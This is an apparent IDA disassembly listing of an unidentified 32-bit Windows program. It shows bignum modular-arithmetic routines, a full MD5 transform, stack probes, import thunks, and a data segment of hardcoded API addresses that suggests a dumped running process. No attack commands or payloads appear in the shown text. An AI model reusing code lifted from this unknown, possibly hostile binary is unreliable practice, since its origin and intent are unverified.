loc_44459A: ; CODE XREF: sub_444580+5D�j
lea edi, dword_44DAE8
mov ecx, 10h
xor eax, eax
loc_4445A7: ; CODE XREF: sub_444580+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_4445A7
call sub_444600
bt dword_44DB28, ebx
jnb short loc_4445DC
mov esi, edx
lea edi, dword_44DAE8
xor eax, eax
mov ecx, 10h
loc_4445CB: ; CODE XREF: sub_444580+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4445CB
call sub_444600
loc_4445DC: ; CODE XREF: sub_444580+3A�j
dec ebx
jns short loc_44459A
mov edi, edx
lea esi, dword_44DAE8
mov ecx, 10h
rep movsd
retn
sub_444580 endp
; =============== S U B R O U T I N E =======================================
sub_4445EF proc near ; CODE XREF: sub_444524+29�p
; sub_444580+15�p
mov ebx, 1FFh
loc_4445F4: ; CODE XREF: sub_4445EF+B�j
bt [edi], ebx
jb short locret_4445FC
dec ebx
jnz short loc_4445F4
locret_4445FC: ; CODE XREF: sub_4445EF+8�j
retn
sub_4445EF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_444600 proc near ; CODE XREF: sub_444580+2E�p
; sub_444580+57�p
lea esi, dword_44DAE8
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_44460E: ; CODE XREF: sub_444600+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_444637
ja short loc_44461B
dec ecx
jns short loc_44460E
loc_44461B: ; CODE XREF: sub_444600+16�j
mov esi, [ebp+14h]
lea edi, dword_44DAE8
xor eax, eax
mov ecx, 10h
loc_44462B: ; CODE XREF: sub_444600+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_44462B
locret_444637: ; CODE XREF: sub_444600+14�j
retn
sub_444600 endp
; =============== S U B R O U T I N E =======================================
sub_444638 proc near ; CODE XREF: sub_444689+32�p
; sub_444689+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_444638 endp
; =============== S U B R O U T I N E =======================================
sub_444645 proc near ; CODE XREF: sub_444689+219�p
; sub_444689+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_444645 endp
; =============== S U B R O U T I N E =======================================
sub_444652 proc near ; CODE XREF: sub_444689+420�p
; sub_444689+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_444652 endp
; =============== S U B R O U T I N E =======================================
sub_444659 proc near ; CODE XREF: sub_444689+627�p
; sub_444689+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_444659 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444662 proc near ; CODE XREF: sub_43E2C0+73�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_444662 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444689 proc near ; CODE XREF: sub_43E2C0+8B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_44DB68, eax
mov eax, [edi+4]
mov dword_44DB6C, eax
mov eax, [edi+8]
mov dword_44DB70, eax
mov eax, [edi+0Ch]
mov dword_44DB74, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444638
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444638
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444638
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444638
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444638
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444638
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444638
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444638
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444638
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444638
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444638
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444638
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444638
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444638
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444638
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444645
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444645
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444645
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444645
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444645
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444645
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444645
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444645
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444645
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444645
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444645
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444645
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444645
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444645
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444645
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444645
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444652
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444652
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444652
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444652
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444652
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444652
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444652
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444652
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444652
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444652
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444652
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444652
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444652
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444652
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444652
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444652
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444659
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444659
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444659
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444659
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444659
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444659
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444659
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444659
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444659
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444659
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444659
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444659
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444659
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444659
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444659
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444659
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_44DB68
add [edi], eax
mov eax, dword_44DB6C
add [edi+4], eax
mov eax, dword_44DB70
add [edi+8], eax
mov eax, dword_44DB74
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_444689 endp
; =============== S U B R O U T I N E =======================================
sub_444ED4 proc near ; CODE XREF: sub_444EF1+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_444ED5: ; CODE XREF: sub_444ED4+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_444ED5
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_444ED4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_444EF1 proc near ; CODE XREF: sub_43F058+42�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_444F21
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_444ED4
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_444F21: ; CODE XREF: sub_444EF1+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_444EF1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_444F30 proc near ; CODE XREF: .text:0043A1BA�p
; DATA XREF: .data:off_44C000�o
xor eax, eax
inc eax
retn 0Ch
sub_444F30 endp
; ---------------------------------------------------------------------------
align 4
push eax
fnstcw word ptr [esp]
mov eax, [esp]
btr dword ptr [esp], 8
or word ptr [esp], 200h
; START OF FUNCTION CHUNK FOR sub_444F5B
loc_444F4A: ; CODE XREF: sub_444F5B+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
loc_444F4E: ; CODE XREF: .text:00444F59�j
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_444F5B
; ---------------------------------------------------------------------------
push eax
fnstcw word ptr [esp]
pop eax
jmp short loc_444F4E
; =============== S U B R O U T I N E =======================================
sub_444F5B proc near ; CODE XREF: .text:loc_43A1A7�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00444F4A SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_444F4A
sub_444F5B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444F6C proc near ; CODE XREF: sub_43A58C+8�p
; sub_43B3B1+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_444F6D: ; CODE XREF: sub_444F6C+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_444F6D
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_444F6C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444F8C proc near ; CODE XREF: sub_43A58C+243�p
; sub_43A58C+5A7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_444F8C endp
; ---------------------------------------------------------------------------
align 4
jmp ds:dword_44E0AC
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444FC4 proc near ; CODE XREF: sub_43A25C+10�p
jmp ds:dword_44E0B0
sub_444FC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444FD0 proc near ; CODE XREF: sub_43A080+13�p
jmp ds:dword_44E0B4
sub_444FD0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444FDC proc near ; CODE XREF: sub_43A1C3+33�p
; sub_43A1C3+45�p ...
jmp ds:dword_44E0C0
sub_444FDC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444FE8 proc near ; CODE XREF: sub_43A1C3+B�p
; sub_43A1C3+17�p ...
jmp ds:dword_44E0C4
sub_444FE8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; ---------------------------------------------------------------------------
jmp ds:dword_44E0C8
; ---------------------------------------------------------------------------
align 10h
jmp ds:dword_44E0CC
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44500C proc near ; CODE XREF: sub_43A25C+4E�p
; sub_43A25C+87�p
jmp ds:dword_44E0D0
sub_44500C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_445018 proc near ; CODE XREF: .text:0043A186�p
jmp ds:dword_44E0D4
sub_445018 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_445024 proc near ; CODE XREF: sub_43A1C3+71�p
; sub_43A1C3+86�p
jmp ds:dword_44E0D8
sub_445024 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_445030 proc near ; CODE XREF: sub_43A25C+9E�p
jmp ds:dword_44E0DC
sub_445030 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
_text ends
; Section 5. (virtual address 00046000)
; Virtual size : 00005BD8 ( 23512.)
; Section size in file : 00005BD8 ( 23512.)
; Offset to raw data for section: 00046000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_bss segment para public 'BSS' use32
assume cs:_bss
;org 446000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_446000 dd 77E77EF1h ; DATA XREF: sub_43C105+130�w
; sub_43E434+D�r
dword_446004 dd 77D46254h ; DATA XREF: sub_43BDDE+12A�w
; sub_4416E3+15�r ...
dword_446008 dd 77E73628h ; DATA XREF: sub_43C105+A4�w
; sub_43CF47+47A�r ...
dword_44600C dd 77E79924h ; DATA XREF: sub_43C105+168�w
; sub_43E434+3A�r
dword_446010 dd 77E778C5h ; DATA XREF: sub_43C105+424�w
; sub_43EE60+1A�r ...
dword_446014 dd 77D4702Fh ; DATA XREF: sub_43B3B1+5A�r
; sub_43B3B1+121�r ...
dword_446018 dd 0 ; DATA XREF: sub_43BB7B+F3�w
; sub_44206A+177�r
dword_44601C dd 76C693F0h ; DATA XREF: sub_43B69E+51�w
; sub_44229C+1B7�r
dword_446020 dd 73D9E65Ch ; DATA XREF: sub_43A58C+2A5�r
; sub_43A58C+3B2�r ...
dword_446024 dd 0 ; DATA XREF: sub_43DA75+1EF�r
; sub_43E073+F4�w
dword_446028 dd 77E78B82h ; DATA XREF: sub_43C105+1D8�w
; sub_43CF47+7D�r ...
dword_44602C dd 77F82D5Ch ; DATA XREF: sub_43C105+280�w
; sub_43E2C0+59�r
dword_446030 dd 73D9ADFAh ; DATA XREF: sub_43DD90+23C�r
; sub_43DD90+269�r ...
dword_446034 dd 77E6AD34h ; DATA XREF: sub_43C105+1BC�w
dword_446038 dd 77121651h ; DATA XREF: sub_43A58C+17�r
; sub_43B4DD+9E�w ...
dword_44603C dd 77DD23D7h ; DATA XREF: sub_43E1C6+66�w
; sub_43E3CE+47�r
dword_446040 dd 77D47EC7h ; DATA XREF: sub_43BDDE+1EE�w
dword_446044 dd 77121680h ; DATA XREF: sub_43A58C+20F�r
; sub_43A58C+229�r ...
dword_446048 dd 77D5264Ah ; DATA XREF: sub_43B992+2D�r
; sub_43BDDE+309�w
dword_44604C dd 0 ; DATA XREF: sub_43BB7B+96�w
; sub_4419F6+535�r
dword_446050 dd 77D441F2h ; DATA XREF: sub_43BDDE+BA�w
; sub_440C0A+308�r
dword_446054 dd 73D9BBAAh ; DATA XREF: sub_43BB7B+217�r
; sub_43CF47+369�r ...
align 10h
dword_446060 dd 0 ; DATA XREF: sub_43D622+F2�r
; sub_43E5EA+3C8�r ...
dd 3E7h dup(0)
dword_447000 dd 77E78C17h ; DATA XREF: sub_43B9CB+DC�r
; sub_43C105+344�w
dword_447004 dd 77E75E67h ; DATA XREF: sub_43C105+2D4�w
; sub_43DA75+2B3�r ...
dword_447008 dd 77E79908h ; DATA XREF: sub_43C5C3+372�w
; sub_43E507+18�r ...
dword_44700C dd 77E62D7Ah ; DATA XREF: sub_43C105+34�w
dword_447010 dd 77D5C2CCh ; DATA XREF: sub_43BDDE+D6�w
; sub_4416E3+32�r
align 10h
dword_447020 dd 40h dup(0) ; DATA XREF: sub_43BB7B+A6�o
; sub_43D523+66�o ...
dword_447120 dd 77C724ACh ; DATA XREF: sub_43D4B3+69�w
; sub_440C0A+19C�r
align 10h
dword_447130 dd 0 ; DATA XREF: sub_43D622:loc_43D642�r
; sub_43D622+5E�w ...
dd 3E7h dup(0)
dword_4480D0 dd 771C6F69h ; DATA XREF: sub_43D3CC+82�w
; sub_43F6B1+44�r
dword_4480D4 dd 77E6869Bh ; DATA XREF: sub_43B9CB+F6�r
; sub_43C105+360�w
dword_4480D8 dd 771C16BAh ; DATA XREF: sub_43D3CC+9E�w
dword_4480DC dd 77D4DC11h ; DATA XREF: sub_43BDDE+20A�w
; sub_440C0A+1D5�r
dword_4480E0 dd 77E684C6h ; DATA XREF: sub_43C105+14C�w
; sub_43CF47+44C�r
align 10h
dword_4480F0 dd 41h dup(0) ; DATA XREF: sub_43BB7B+52�o
; sub_43BB7B+E2�o ...
dword_4481F4 dd 73D9E660h ; DATA XREF: sub_440F62+1B9�w
; sub_442F46+4C8�r ...
dword_4481F8 dd 77E7A5FDh ; DATA XREF: sub_43B4DD+44�r
; sub_43B4DD+60�r ...
align 10h
byte_448200 db 0 ; DATA XREF: sub_43D622+FB�r
; sub_43E5EA+3D1�r ...
align 4
dd 0F9h dup(0)
dword_4485E8 dd 77E79F93h ; DATA XREF: sub_43B4DD+D�r
; sub_43B69E+D�r ...
dword_4485EC dd 77DD22EAh ; DATA XREF: sub_43E1C6+4A�w
; sub_43E3CE+26�r
dword_4485F0 dd 77DDACABh ; DATA XREF: sub_43B7A3+23�r
; sub_43E1C6+A1�w
dword_4485F4 dd 77D4456Bh ; DATA XREF: sub_43BDDE+F2�w
dword_4485F8 dd 77E7513Ch ; DATA XREF: sub_43C105+4B6�w
; sub_441189+12B�r
dword_4485FC dd 77D49951h ; DATA XREF: sub_43BDDE+27A�w
; sub_43FB8B+F1F�r ...
dword_448600 dd 77E704FCh ; DATA XREF: sub_43BB7B+16�r
; sub_43C105+3EC�w ...
dword_448604 dd 76C69891h ; DATA XREF: sub_44229C+18E�r
; sub_442D4B+54�w
dword_448608 dd 0 ; DATA XREF: sub_43E1AF+3�o
; sub_43E1AF+E�r ...
dword_44860C dd 77E78EAAh ; DATA XREF: sub_43C105+2F0�w
; sub_43F357+4A�r ...
dword_448610 dd 100E0h ; DATA XREF: sub_440C0A+24D�w
dword_448614 dd 0EE00h ; DATA XREF: sub_440C0A+273�w
; sub_44229C:loc_442459�r
dword_448618 dd 77D46F5Bh ; DATA XREF: sub_43BDDE+82�w
; sub_440BEC+13�r
dword_44861C dd 77E79A45h ; DATA XREF: sub_43C105+248�w
; sub_43F9B8+186�r ...
